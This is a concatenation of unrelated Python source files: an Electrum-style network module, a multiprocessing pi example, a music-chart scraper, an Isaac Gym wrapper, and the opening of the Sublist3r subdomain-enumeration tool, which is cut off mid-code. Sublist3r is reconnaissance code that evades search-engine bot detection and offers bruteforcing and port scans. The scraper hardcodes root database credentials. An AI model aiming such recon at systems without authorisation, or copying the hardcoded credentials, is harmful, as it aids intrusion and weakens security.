self.pending_sends.append((messages, callback))
def process_pending_sends(self):
# Requests needs connectivity. If we don't have an interface,
# we cannot process them.
if not self.interface:
return
with self.lock:
sends = self.pending_sends
self.pending_sends = []
for messages, callback in sends:
for method, params in messages:
r = None
if method.endswith('.subscribe'):
k = self.get_index(method, params)
# add callback to list
l = self.subscriptions.get(k, [])
if callback not in l:
l.append(callback)
self.subscriptions[k] = l
# check cached response for subscriptions
r = self.sub_cache.get(k)
if r is not None:
util.print_error("cache hit", k)
callback(r)
else:
message_id = self.queue_request(method, params)
self.unanswered_requests[message_id] = method, params, callback
def unsubscribe(self, callback):
'''Unsubscribe a callback to free object references to enable GC.'''
# Note: we can't unsubscribe from the server, so if we receive
# subsequent notifications process_response() will emit a harmless
# "received unexpected notification" warning
with self.lock:
for v in self.subscriptions.values():
if callback in v:
v.remove(callback)
def connection_down(self, server):
'''A connection to server either went down, or was never made.
We distinguish by whether it is in self.interfaces.'''
self.disconnected_servers.add(server)
if server == self.default_server:
self.set_status('disconnected')
if server in self.interfaces:
self.close_interface(self.interfaces[server])
self.notify('interfaces')
for b in self.blockchains.values():
if b.catch_up == server:
b.catch_up = None
def new_interface(self, server, socket):
# todo: get tip first, then decide which checkpoint to use.
self.add_recent_server(server)
interface = Interface(server, socket)
interface.blockchain = None
interface.tip_header = None
interface.tip = 0
interface.mode = 'default'
interface.request = None
self.interfaces[server] = interface
self.queue_request('blockchain.headers.subscribe', [], interface)
if server == self.default_server:
self.switch_to_interface(server)
#self.notify('interfaces')
def maintain_sockets(self):
'''Socket maintenance.'''
# Responses to connection attempts?
while not self.socket_queue.empty():
server, socket = self.socket_queue.get()
if server in self.connecting:
self.connecting.remove(server)
if socket:
self.new_interface(server, socket)
else:
self.connection_down(server)
# Send pings and shut down stale interfaces
# must use copy of values
for interface in list(self.interfaces.values()):
if interface.has_timed_out():
self.connection_down(interface.server)
elif interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, interface)
now = time.time()
# nodes
if len(self.interfaces) + len(self.connecting) < self.num_server:
self.start_random_interface()
if now - self.nodes_retry_time > NODES_RETRY_INTERVAL:
self.print_error('network: retrying connections')
self.disconnected_servers = set([])
self.nodes_retry_time = now
# main interface
if not self.is_connected():
if self.auto_connect:
if not self.is_connecting():
self.switch_to_random_interface()
else:
if self.default_server in self.disconnected_servers:
if now - self.server_retry_time > SERVER_RETRY_INTERVAL:
self.disconnected_servers.remove(self.default_server)
self.server_retry_time = now
else:
self.switch_to_interface(self.default_server)
else:
if self.config.is_fee_estimates_update_required():
self.request_fee_estimates()
def request_chunk(self, interface, idx):
interface.print_error("requesting chunk %d" % idx)
self.queue_request('blockchain.block.get_chunk', [idx], interface)
interface.request = idx
interface.req_time = time.time()
def on_get_chunk(self, interface, response):
'''Handle receiving a chunk of block headers'''
error = response.get('error')
result = response.get('result')
params = response.get('params')
if result is None or params is None or error is not None:
interface.print_error(error or 'bad response')
return
# Ignore unsolicited chunks
index = params[0]
if interface.request != index:
return
connect = interface.blockchain.connect_chunk(index, result)
# If not finished, get the next chunk
if not connect:
self.connection_down(interface.server)
return
if interface.blockchain.height() < interface.tip:
self.request_chunk(interface, index+1)
else:
interface.request = None
interface.mode = 'default'
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.notify('updated')
def request_header(self, interface, height):
#interface.print_error("requesting header %d" % height)
self.queue_request('blockchain.block.get_header', [height], interface)
interface.request = height
interface.req_time = time.time()
def on_get_header(self, interface, response):
'''Handle receiving a single block header'''
header = response.get('result')
if not header:
interface.print_error(response)
self.connection_down(interface.server)
return
height = header.get('block_height')
if interface.request != height:
interface.print_error("unsolicited header",interface.request, height)
self.connection_down(interface.server)
return
chain = blockchain.check_header(header)
if interface.mode == 'backward':
if chain:
interface.print_error("binary search")
interface.mode = 'binary'
interface.blockchain = chain
interface.good = height
next_height = (interface.bad + interface.good) // 2
else:
if height == 0:
self.connection_down(interface.server)
next_height = None
else:
interface.bad = height
interface.bad_header = header
delta = interface.tip - height
next_height = max(0, interface.tip - 2 * delta)
elif interface.mode == 'binary':
if chain:
interface.good = height
interface.blockchain = chain
else:
interface.bad = height
interface.bad_header = header
if interface.bad != interface.good + 1:
next_height = (interface.bad + interface.good) // 2
elif not interface.blockchain.can_connect(interface.bad_header, check_height=False):
self.connection_down(interface.server)
next_height = None
else:
branch = self.blockchains.get(interface.bad)
if branch is not None:
if branch.check_header(interface.bad_header):
interface.print_error('joining chain', interface.bad)
next_height = None
elif branch.parent().check_header(header):
interface.print_error('reorg', interface.bad, interface.tip)
interface.blockchain = branch.parent()
next_height = None
else:
interface.print_error('checkpoint conflicts with existing fork', branch.path())
branch.write('', 0)
branch.save_header(interface.bad_header)
interface.mode = 'catch_up'
interface.blockchain = branch
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
bh = interface.blockchain.height()
next_height = None
if bh > interface.good:
if not interface.blockchain.check_header(interface.bad_header):
b = interface.blockchain.fork(interface.bad_header)
self.blockchains[interface.bad] = b
interface.blockchain = b
interface.print_error("new chain", b.checkpoint)
interface.mode = 'catch_up'
next_height = interface.bad + 1
interface.blockchain.catch_up = interface.server
else:
assert bh == interface.good
if interface.blockchain.catch_up is None and bh < interface.tip:
interface.print_error("catching up from %d"% (bh + 1))
interface.mode = 'catch_up'
next_height = bh + 1
interface.blockchain.catch_up = interface.server
self.notify('updated')
elif interface.mode == 'catch_up':
can_connect = interface.blockchain.can_connect(header)
if can_connect:
interface.blockchain.save_header(header)
next_height = height + 1 if height < interface.tip else None
else:
# go back
interface.print_error("cannot connect", height)
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
next_height = height - 1
if next_height is None:
# exit catch_up state
interface.print_error('catch up done', interface.blockchain.height())
interface.blockchain.catch_up = None
self.switch_lagging_interface()
self.notify('updated')
else:
raise BaseException(interface.mode)
# If not finished, get the next header
if next_height:
if interface.mode == 'catch_up' and interface.tip > next_height + 50:
self.request_chunk(interface, next_height // 2016)
else:
self.request_header(interface, next_height)
else:
interface.mode = 'default'
interface.request = None
self.notify('updated')
# refresh network dialog
self.notify('interfaces')
def maintain_requests(self):
for interface in list(self.interfaces.values()):
if interface.request and time.time() - interface.request_time > 20:
interface.print_error("blockchain request timed out")
self.connection_down(interface.server)
continue
def wait_on_sockets(self):
# Python docs say Windows doesn't like empty selects.
# Sleep to prevent busy looping
if not self.interfaces:
time.sleep(0.1)
return
rin = [i for i in self.interfaces.values()]
win = [i for i in self.interfaces.values() if i.num_requests()]
try:
rout, wout, xout = select.select(rin, win, [], 0.1)
except socket.error as e:
# TODO: py3, get code from e
code = None
if code == errno.EINTR:
return
raise
assert not xout
for interface in wout:
interface.send_requests()
for interface in rout:
self.process_responses(interface)
def init_headers_file(self):
b = self.blockchains[0]
if b.get_hash(0) == bitcoin.GENESIS:
self.downloading_headers = False
return
filename = b.path()
def download_thread():
try:
import urllib.request, socket
socket.setdefaulttimeout(30)
self.print_error("downloading ", bitcoin.HEADERS_URL)
urllib.request.urlretrieve(bitcoin.HEADERS_URL, filename + '.tmp')
os.rename(filename + '.tmp', filename)
self.print_error("done.")
except Exception:
self.print_error("download failed. creating file", filename)
open(filename, 'wb+').close()
b = self.blockchains[0]
with b.lock: b.update_size()
self.downloading_headers = False
self.downloading_headers = True
t = threading.Thread(target = download_thread)
t.daemon = True
t.start()
def run(self):
self.init_headers_file()
while self.is_running() and self.downloading_headers:
time.sleep(1)
while self.is_running():
self.maintain_sockets()
self.wait_on_sockets()
self.maintain_requests()
self.run_jobs() # Synchronizer and Verifier
self.process_pending_sends()
self.stop_network()
self.on_stop()
def on_notify_header(self, interface, header):
height = header.get('block_height')
if not height:
return
interface.tip_header = header
interface.tip = height
if interface.mode != 'default':
return
b = blockchain.check_header(header)
if b:
interface.blockchain = b
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
b = blockchain.can_connect(header)
if b:
interface.blockchain = b
b.save_header(header)
self.switch_lagging_interface()
self.notify('updated')
self.notify('interfaces')
return
tip = max([x.height() for x in self.blockchains.values()])
if tip >=0:
interface.mode = 'backward'
interface.bad = height
interface.bad_header = header
self.request_header(interface, min(tip, height - 1))
else:
chain = self.blockchains[0]
if chain.catch_up is None:
chain.catch_up = interface
interface.mode = 'catch_up'
interface.blockchain = chain
self.request_header(interface, 0)
def blockchain(self):
if self.interface and self.interface.blockchain is not None:
self.blockchain_index = self.interface.blockchain.checkpoint
return self.blockchains[self.blockchain_index]
def get_blockchains(self):
out = {}
for k, b in self.blockchains.items():
r = list(filter(lambda i: i.blockchain==b, list(self.interfaces.values())))
if r:
out[k] = r
return out
def follow_chain(self, index):
blockchain = self.blockchains.get(index)
if blockchain:
self.blockchain_index = index
self.config.set_key('blockchain_index', index)
for i in self.interfaces.values():
if i.blockchain == blockchain:
self.switch_to_interface(i.server)
break
else:
raise BaseException('blockchain not found', index)
if self.interface:
server = self.interface.server
host, port, protocol, proxy, auto_connect = self.get_parameters()
host, port, protocol = server.split(':')
self.set_parameters(host, port, protocol, proxy, auto_connect)
def get_local_height(self):
return self.blockchain().height()
def synchronous_get(self, request, timeout=30):
q = queue.Queue()
self.send([request], q.put)
try:
r = q.get(True, timeout)
except queue.Empty:
raise BaseException('Server did not answer')
if r.get('error'):
raise BaseException(r.get('error'))
return r.get('result')
def broadcast(self, tx, timeout=30):
tx_hash = tx.txid()
try:
out = self.synchronous_get(('blockchain.transaction.broadcast', [str(tx)]), timeout)
except BaseException as e:
return False, "error: " + str(e)
if out != tx_hash:
return False, "error: " + out
return True, out
|
pi.py | # Version of the Python Pi example using multiprocessing.
# Dr Owain Kenway
import time
import sys
from multiprocessing import Process, Queue, cpu_count
# We define a function to calculate the area in a chunk so that we can assign
# it to each process.
# n - the _TOTAL_ number of slices.
# lower - the lowest number of the slice.
# upper - the upper limit so that index < upper
# q - a queue to communicate back on.
def pi_chunk(n, lower, upper, q):
step = 1.0 / n
p = step * sum(4.0/(1.0 + ((i + 0.5) * (i + 0.5) * step * step)) for i in range(lower, upper))
q.put(p)
# Our usual main. The docs imply this is _not_ optional for multiprocessing but
# I've not tested this...
if __name__=='__main__':
num_steps = 10000000 # number of slices
# Default to the number of processors exposed by cpu_count().
# Note, on systems with SMT/Hyperthreading turned on, this is a number of
# hardware threads, not real cores.
procs = cpu_count()
q = Queue() # Queue to communicate on
processes = [] # List where we will store our processes
decomp_debug = False # Show debugging?
# First argument is number of slices as normal. Second argument is number of
# processes to launch. ANY third argument enables debug mode to check
# decomposition.
if len(sys.argv) > 1:
num_steps = int(sys.argv[1])
if len(sys.argv) > 2:
procs = int(sys.argv[2])
if len(sys.argv) > 3:
decomp_debug = True
# Usual output.
print("Calculating PI using:\n " + str(num_steps) + " slices")
print(" " + str(procs) + " processes")
# Get initial time.
start = time.time()
# Loop over the number of processes, calculating lower and upper bounds for
# indices. Create a process object for each range and add it to the list then
# start it.
for a in range(procs):
l = int(a * (num_steps/procs))
u = int((a + 1) * (num_steps/procs))
if (a == (procs - 1)):
u = num_steps # Correct for slight integer div issues.
if (decomp_debug):
print(str(a) + " lower: " + str(l) + " upper: " + str(u))
processes.append(Process(target=pi_chunk, args=(num_steps, l, u,q)))
processes[a].start()
# Create a list of results and then get procs number of results from the queue.
# Because of the algorithm, we don't care which order we get the results in.
ps = []
for a in range(procs):
ps.append(q.get())
if (decomp_debug):
print(ps)
# Join all the processes.
for a in range(procs):
processes[a].join()
# Calculate overall result, stop clock.
p = sum(ps)
stop = time.time()
# Print our results.
print("Obtained value of PI: " + str(p))
print("Time taken: " + str(stop - start) + " seconds")
|
main.py | from bs4 import BeautifulSoup
import requests
import itertools
import threading
import json
import datetime
import apple_scraper
import spotify_scraper
import mysql.connector
import os
import json
from mysql.connector import errorcode
sem = threading.Semaphore()
total = 0
counter = 0
try:
mydb = mysql.connector.connect(
host="127.0.0.1",
user="root",
passwd="password",
database="spopplechart"
)
except mysql.connector.Error as err:
if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
print("Something is wrong with your user name or password")
elif err.errno == errorcode.ER_BAD_DB_ERROR:
print("Database does not exist")
else:
print(err)
apple_links = {}
spotify_links = {}
def apple_playlist_scraper(apple_links):
global counter
for country, links in apple_links.items():
sem.acquire()
print("Scraping Apple data for " + country + " (" + str(counter) + " out of " + str(total) + ")", )
sem.release()
source = requests.get(links).text
soup = BeautifulSoup(source, 'lxml')
songs = []
albums = []
artists = []
artworks = []
count = 0
for count, song in enumerate(soup.find_all('div', class_='songs-list-row__song-name')):
songs.append(str(count + 1) + '.' + song.text)
# isAlbum if False
isAlbum = False
for artist_album in soup.find_all('div', class_='songs-list__song-link-wrapper'):
if (isAlbum):
originalText = (artist_album.text).split()
albums.append(" ".join(originalText).replace(" ,", ","))
isAlbum = False
continue
else:
originalText = (artist_album.text).split()
artists.append(" ".join(originalText).replace(" ,", ","))
isAlbum = True
for artwork in soup.find_all('div', class_='media-artwork-v2--tracklist'):
if artwork.picture.source['srcset'] != "":
artworks.append(artwork.picture.source['srcset'].split()[0])
else:
artworks.append(artwork.picture.source['data-srcset'].split()[0])
for (song,album,artist,artwork) in zip(songs,albums,artists,artworks):
mycursor = mydb.cursor()
sql = "INSERT INTO chart_record (date,country,position, song, album, artists, artwork, spotify, applemusic) VALUE (%s,%s,%s,%s,%s,%s,%s,%s,%s)"
val = (datetime.datetime.now().date(),country,song.split('.', 1)[0], song.split('.', 1)[1], album, artist, artwork, 0, 1)
try:
mycursor.execute(sql,val)
mydb.commit()
except:
None
counter += 1
def spotify_playlist_scraper(spotify_links):
global counter
for country, links in spotify_links.items():
playlist_id = links.split("/").pop()
sem.acquire()
print("Scraping Spotify data for " + country + " (" + str(counter) + " out of " + str(total) + ")", )
sem.release()
source = requests.get("https://open.spotify.com/playlist/" + playlist_id).text
soup = BeautifulSoup(source, 'lxml')
songs = []
albums = []
artists = []
artworks = []
position = 1
for song in soup.find_all('a', class_='eWYxOj'):
songs.append(str(position) + "." + song.text)
position += 1
for artist in soup.find_all('span', class_='Row__Subtitle-sc-brbqzp-1'):
artists.append(artist.text)
# for album in (json.loads(soup.find('script', id='initial-state').text)['entities']['items']['spotify:playlist:' + playlist_id]['tracks']['items']):
# albums.append(album['track']['album']['name'])
# for artwork in (json.loads(soup.find('script', id='initial-state').text)['entities']['items']['spotify:playlist:' + playlist_id]['tracks']['items']):
# artworks.append(artwork['track']['album']['images'][2]['url'])
for (song, album, artist, artwork) in zip(songs, albums, artists, artworks):
mycursor = mydb.cursor()
sql = "INSERT INTO chart_record (date,country,position, song, album, artists, artwork, spotify, applemusic) VALUE (%s,%s,%s,%s,%s,%s,%s,%s,%s)"
val = (datetime.datetime.now().date(), country, song.split('.', 1)[0], song.split('.', 1)[1], album, artist, artwork, 1, 0)
try:
mycursor.execute(sql,val)
mydb.commit()
print("[Committed]", song, 'by', artist + ' (Album:', album + ')')
except:
print("[Skipped] Duplicate record found")
counter += 1
def main():
global total
PATH = "./scraper_generated_apple_playlist.json"
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
f = open('scraper_generated_apple_playlist.json')
apple_links = json.load(f)
else:
print("Either the file is missing or not readable")
apple_scraper.main()
PATH = "./scraper_generated_spotify_playlist.json"
if os.path.isfile(PATH) and os.access(PATH, os.R_OK):
f = open('scraper_generated_spotify_playlist.json')
spotify_links = json.load(f)
else:
print("Either the file is missing or not readable")
spotify_scraper.main()
total = len(spotify_links) + len(apple_links) - 2
try:
thread_one = threading.Thread(target=spotify_playlist_scraper, args=(spotify_links, ))
thread_two = threading.Thread(target=apple_playlist_scraper, args=(apple_links, ))
thread_one.start()
thread_two.start()
thread_one.join()
thread_two.join()
except:
print("Error: unable to start thread")
main() |
IsaacGym_OLD.py | import multiprocessing as mp
import sys
import isaacgym
import numpy as np
import torch # import torch after import IsaacGym modules
from elegantrl.envs.utils_OLD.config import set_seed, get_args, parse_sim_params, load_cfg
from elegantrl.envs.utils_OLD.parse_task import parse_task
from typing import Tuple
dir((isaacgym, torch))
"""
isaacgym/gymdeps.py", line 21, in _import_deps
raise ImportError("PyTorch was imported before isaacgym modules.
Please import torch after isaacgym modules.")
;
run the following code in bash before running.
export LD_LIBRARY_PATH=/xfs/home/podracer_steven/anaconda3/envs/rlgpu/lib
can't use os.environ['LD_LIBRARY_PATH'] = /xfs/home/podracer_steven/anaconda3/envs/rlgpu/lib
cd isaacgym/python/ElegantRL-1212
conda activate rlgpu
export LD_LIBRARY_PATH=~/anaconda3/envs/rlgpu/lib
"""
class IsaacVecEnv:
def __init__(
self, env_name, env_num=32, device_id=0, rl_device_id=None, if_print=True
):
"""Preprocess an Isaac Gym vector environment for RL training.
[Isaac Gym](https://developer.nvidia.com/isaac-gym)
NVIDIA Isaac Gym. Preview 2
"""
"""env_name"""
sys_argv = sys.argv # build a pure sys.argv for IsaacGym args = get_args()
sys.argv = sys.argv[:1] # build a pure sys.argv for IsaacGym args = get_args()
env_target_return_dict = {
"Ant": 14e3, # 16e3
"Humanoid": 9e3, # 11e3
}
assert env_name in env_target_return_dict
args = get_args(task_name=env_name, headless=True)
# set after `args = get_args()` # get_args() in .../utils/config.py
rl_device_id = device_id if rl_device_id is None else rl_device_id
args.rl_device = f"cuda:{rl_device_id}" if rl_device_id >= 0 else "cpu"
args.device_id = device_id # PhyX device
args.num_envs = env_num # in `.../cfg/train/xxx.yaml`, `numEnvs`
# set before load_cfg()
cfg, cfg_train, log_dir = load_cfg(args)
sim_params = parse_sim_params(args, cfg, cfg_train)
set_seed(cfg_train["params"]["seed"])
task, env = parse_task(args, cfg, cfg_train, sim_params)
assert env_num == env.num_environments
sys.argv = sys_argv # build a pure sys.argv for IsaacGym args = get_args()
"""max_step"""
max_step = getattr(task, "max_episode_length", None)
if max_step is None:
max_step = getattr(task, "_max_episode_steps")
"""if_discrete"""
# import gym
# if_discrete = isinstance(env.act_space, gym.spaces.Discrete)
if_discrete = "float" not in str(env.action_space.dtype)
"""state_dim"""
state_dim = task.num_obs
assert isinstance(state_dim, int)
"""action_dim"""
if if_discrete:
action_dim = env.action_space.n
else:
action_dim = task.num_actions
assert all(env.action_space.high == np.ones(action_dim))
assert all((-env.action_space.low) == np.ones(action_dim))
"""target_return"""
target_return = env_target_return_dict[env_name]
self.device = torch.device(env.rl_device)
self.env = env
self.env_num = env_num
self.env_name = env_name
self.state_dim = state_dim
self.action_dim = action_dim
self.if_discrete = if_discrete
self.target_return = target_return
if if_print:
env_args = {
"env_num": env_num,
"env_name": env_name,
"max_step": max_step,
"state_dim": state_dim,
"action_dim": action_dim,
"if_discrete": if_discrete,
"target_return": target_return,
}
env_args_repr = repr(env_args)
env_args_repr = env_args_repr.replace(",", ",\n ")
env_args_repr = env_args_repr.replace("{", "{\n ")
env_args_repr = env_args_repr.replace("}", ",\n}")
print(f"env_args = {env_args_repr}")
def reset(self) -> torch.Tensor:
return self.env.reset()
def step(
self, actions: torch.Tensor
) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor, None]:
return self.env.step(actions)
class IsaacOneEnv(IsaacVecEnv):
def __init__(self, env_name, device_id=0, if_print=True):
"""Preprocess an Isaac Gym single environment for RL evaluating.
[Isaac Gym](https://developer.nvidia.com/isaac-gym)
NVIDIA Isaac Gym. Preview 2
"""
super().__init__(
env_name=env_name,
env_num=1,
device_id=device_id,
rl_device_id=-1,
if_print=if_print,
)
def reset(self) -> np.ndarray:
ten_states = self.env.reset()
return ten_states[0].detach().numpy() # state
def step(
self, action: np.ndarray
) -> Tuple[np.ndarray, np.ndarray, np.ndarray, None]:
ten_action = torch.as_tensor(action, dtype=torch.float32).unsqueeze(0)
ten_state, ten_reward, ten_done, info_dict = self.env.step(ten_action)
state = ten_state[0].detach().numpy()
reward = ten_reward[0].item()
done = ten_done[0].item()
return state, reward, done, info_dict
"""check"""
def run_isaac_env(env_name="Ant", if_vec_env=True):
# from elegantrl.envs.IsaacGym import IsaacVecEnv, IsaacOneEnv
# env = IsaacVecEnv(env_name='Ant', env_num=32, device_id=0, if_print=True)
env_func = IsaacVecEnv if if_vec_env else IsaacOneEnv
if env_name == "Ant":
env_args = {
"env_num": 32,
"env_name": "Ant",
"max_step": 1000,
"state_dim": 60,
"action_dim": 8,
"if_discrete": False,
"target_return": 14000.0,
"device_id": None, # set by worker
"if_print": False, # if_print=False in default
}
elif env_name == "Humanoid":
env_args = {
"env_num": 32,
"env_name": "Humanoid",
"max_step": 1000,
"state_dim": 108,
"action_dim": 21,
"if_discrete": False,
"target_return": 9000.0,
"device_id": None, # set by worker
"if_print": False, # if_print=False in default
}
else:
raise KeyError(f"| run_isaac_env: env_name={env_name}")
if not if_vec_env:
env_args["env_num"] = 1
# from elegantrl.train.config import build_env
# env = build_env(env=None, env_func=env_func, env_args=env_args)
from elegantrl.train.config import check_env
env = check_env(env=None, env_func=env_func, env_args=env_args, gpu_id=0)
dir(env)
def run_isaac_gym_multiple_process():
process_list = [mp.Process(target=run_isaac_env, args=("Ant", True))] # VecEnv
process_list.append(
mp.Process(
target=run_isaac_env,
args=("Ant", False),
)
) # OneEnv
mp.set_start_method(method="spawn") # should be
[p.start() for p in process_list]
[p.join() for p in process_list]
if __name__ == "__main__":
run_isaac_env(env_name="Ant", if_vec_env=True)
# run_isaac_env(env_name='Ant', if_vec_env=False)
# run_isaac_gym_multiple_process()
|
sublist3r.py | #!/usr/bin/env python
# coding: utf-8
# Sublist3r v1.0
# By Ahmed Aboul-Ela - twitter.com/aboul3la
import argparse
import hashlib
import json
import multiprocessing
import os
import random
# modules in standard library
import re
import socket
import sys
import threading
import time
from collections import Counter
import dns.resolver
import requests
# external modules
from subbrute import subbrute
# Python 2.x and 3.x compatiablity
if sys.version > "3":
import urllib.parse as urlparse
import urllib.parse as urllib
else:
import urllib # type: ignore
import urlparse # type: ignore
# In case you cannot install some of the required development packages
# there's also an option to disable the SSL warning:
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
# Check if we are running this on windows platform
is_windows = sys.platform.startswith("win")
# Console Colors
if is_windows:
# Windows deserves coloring too :D
G = "\033[92m" # green
Y = "\033[93m" # yellow
B = "\033[94m" # blue
R = "\033[91m" # red
W = "\033[0m" # white
try:
import colorama
import win_unicode_console
win_unicode_console.enable()
colorama.init()
# Now the unicode will work ^_^
except:
print(
"[!] Error: Coloring libraries not installed, no coloring will be used [Check the readme]"
)
G = Y = B = R = W = G = Y = B = R = W = ""
else:
G = "\033[92m" # green
Y = "\033[93m" # yellow
B = "\033[94m" # blue
R = "\033[91m" # red
W = "\033[0m" # white
def no_color():
global G, Y, B, R, W
G = Y = B = R = W = ""
def banner():
print(
"""%s
____ _ _ _ _ _____
/ ___| _ _| |__ | (_)___| |_|___ / _ __
\___ \| | | | '_ \| | / __| __| |_ \| '__|
___) | |_| | |_) | | \__ \ |_ ___) | |
|____/ \__,_|_.__/|_|_|___/\__|____/|_|%s%s
# Coded By Ahmed Aboul-Ela - @aboul3la
"""
% (R, W, Y)
)
def parser_error(errmsg):
banner()
print("Usage: python " + sys.argv[0] + " [Options] use -h for help")
print(R + "Error: " + errmsg + W)
sys.exit()
def parse_args():
# parse the arguments
parser = argparse.ArgumentParser(
epilog="\tExample: \r\npython " + sys.argv[0] + " -d google.com"
)
parser.error = parser_error
parser._optionals.title = "OPTIONS"
parser.add_argument(
"-d", "--domain", help="Domain name to enumerate it's subdomains", required=True
)
parser.add_argument(
"-b",
"--bruteforce",
help="Enable the subbrute bruteforce module",
nargs="?",
default=False,
)
parser.add_argument(
"-p", "--ports", help="Scan the found subdomains against specified tcp ports"
)
parser.add_argument(
"-v",
"--verbose",
help="Enable Verbosity and display results in realtime",
nargs="?",
default=False,
)
parser.add_argument(
"-t",
"--threads",
help="Number of threads to use for subbrute bruteforce",
type=int,
default=30,
)
parser.add_argument(
"-e", "--engines", help="Specify a comma-separated list of search engines"
)
parser.add_argument("-o", "--output", help="Save the results to text file")
parser.add_argument(
"-n",
"--no-color",
help="Output without color",
default=False,
action="store_true",
)
return parser.parse_args()
def write_file(filename, subdomains):
# saving subdomains results to output file
print("%s[-] Saving results to file: %s%s%s%s" % (Y, W, R, filename, W))
with open(str(filename), "wt") as f:
for subdomain in subdomains:
f.write(subdomain + os.linesep)
def subdomain_sorting_key(hostname):
"""Sorting key for subdomains
This sorting key orders subdomains from the top-level domain at the right
reading left, then moving '^' and 'www' to the top of their group. For
example, the following list is sorted correctly:
[
'example.com',
'www.example.com',
'a.example.com',
'www.a.example.com',
'b.a.example.com',
'b.example.com',
'example.net',
'www.example.net',
'a.example.net',
]
"""
parts = hostname.split(".")[::-1]
if parts[-1] == "www":
return parts[:-1], 1
return parts, 0
class enumratorBase(object):
def __init__(
self, base_url, engine_name, domain, subdomains=None, silent=False, verbose=True
):
subdomains = subdomains or []
self.domain = urlparse.urlparse(domain).netloc
self.session = requests.Session()
self.subdomains = []
self.timeout = 25
self.base_url = base_url
self.engine_name = engine_name
self.silent = silent
self.verbose = verbose
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.8",
"Accept-Encoding": "gzip",
}
self.print_banner()
def print_(self, text):
if not self.silent:
print(text)
return
def print_banner(self):
"""subclass can override this if they want a fancy banner :)"""
self.print_(G + "[-] Searching now in %s.." % (self.engine_name) + W)
return
def send_req(self, query, page_no=1):
url = self.base_url.format(query=query, page_no=page_no)
try:
resp = self.session.get(url, headers=self.headers, timeout=self.timeout)
except Exception:
resp = None
return self.get_response(resp)
def get_response(self, response):
if response is None:
return 0
return response.text if hasattr(response, "text") else response.content
def check_max_subdomains(self, count):
if self.MAX_DOMAINS == 0:
return False
return count >= self.MAX_DOMAINS
def check_max_pages(self, num):
if self.MAX_PAGES == 0:
return False
return num >= self.MAX_PAGES
# override
def extract_domains(self, resp):
"""chlid class should override this function"""
return
# override
def check_response_errors(self, resp):
"""chlid class should override this function
The function should return True if there are no errors and False otherwise
"""
return True
def should_sleep(self):
"""Some enumrators require sleeping to avoid bot detections like Google enumerator"""
return
def generate_query(self):
"""chlid class should override this function"""
return
def get_page(self, num):
"""chlid class that user different pagnation counter should override this function"""
return num + 10
def enumerate(self, altquery=False):
flag = True
page_no = 0
prev_links = []
retries = 0
while flag:
query = self.generate_query()
count = query.count(
self.domain
) # finding the number of subdomains found so far
# if they we reached the maximum number of subdomains in search query
# then we should go over the pages
if self.check_max_subdomains(count):
page_no = self.get_page(page_no)
if self.check_max_pages(
page_no
): # maximum pages for Google to avoid getting blocked
return self.subdomains
resp = self.send_req(query, page_no)
# check if there is any error occured
if not self.check_response_errors(resp):
return self.subdomains
links = self.extract_domains(resp)
# if the previous page hyperlinks was the similar to the current one, then maybe we have reached the last page
if links == prev_links:
retries += 1
page_no = self.get_page(page_no)
# make another retry maybe it isn't the last page
if retries >= 3:
return self.subdomains
prev_links = links
self.should_sleep()
return self.subdomains
class enumratorBaseThreaded(multiprocessing.Process, enumratorBase):
def __init__(
self,
base_url,
engine_name,
domain,
subdomains=None,
q=None,
silent=False,
verbose=True,
):
subdomains = subdomains or []
enumratorBase.__init__(
self,
base_url,
engine_name,
domain,
subdomains,
silent=silent,
verbose=verbose,
)
multiprocessing.Process.__init__(self)
self.q = q
return
def run(self):
domain_list = self.enumerate()
for domain in domain_list:
self.q.append(domain)
class GoogleEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://google.com/search?q={query}&btnG=Search&hl=en-US&biw=&bih=&gbv=1&start={page_no}&filter=0"
self.engine_name = "Google"
self.MAX_DOMAINS = 11
self.MAX_PAGES = 200
super(GoogleEnum, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.q = q
return
def extract_domains(self, resp):
links_list = list() # noqa: C408
link_regx = re.compile("<cite.*?>(.*?)<\/cite>")
try:
links_list = link_regx.findall(resp)
for link in links_list:
link = re.sub("<span.*>", "", link)
if not link.startswith("http"):
link = "http://" + link
subdomain = urlparse.urlparse(link).netloc
if (
subdomain
and subdomain not in self.subdomains
and subdomain != self.domain
):
if self.verbose:
self.print_("%s%s: %s%s" % (R, self.engine_name, W, subdomain))
self.subdomains.append(subdomain.strip())
except Exception:
pass
return links_list
def check_response_errors(self, resp):
if (
type(resp) is str or isinstance(resp, unicode) # noqa: F821
) and "Our systems have detected unusual traffic" in resp:
self.print_(
R + "[!] Error: Google probably now is blocking our requests" + W
)
self.print_(R + "[~] Finished now the Google Enumeration ..." + W)
return False
return True
def should_sleep(self):
time.sleep(5)
return
def generate_query(self):
if self.subdomains:
fmt = "site:{domain} -www.{domain} -{found}"
found = " -".join(self.subdomains[: self.MAX_DOMAINS - 2])
query = fmt.format(domain=self.domain, found=found)
else:
query = "site:{domain} -www.{domain}".format(domain=self.domain)
return query
class YahooEnum(enumratorBaseThreaded):
def __init__(self, domain, subdomains=None, q=None, silent=False, verbose=True):
subdomains = subdomains or []
base_url = "https://search.yahoo.com/search?p={query}&b={page_no}"
self.engine_name = "Yahoo"
self.MAX_DOMAINS = 10
self.MAX_PAGES = 0
super(YahooEnum, self).__init__(
base_url,
self.engine_name,
domain,
subdomains,
q=q,
silent=silent,
verbose=verbose,
)
self.q = q
return
def extract_domains(self, resp):
link_regx2 = re.compile(
'<span class=" fz-.*? fw-m fc-12th wr-bw.*?">(.*?)</span>'
)
link_regx = re.compile(
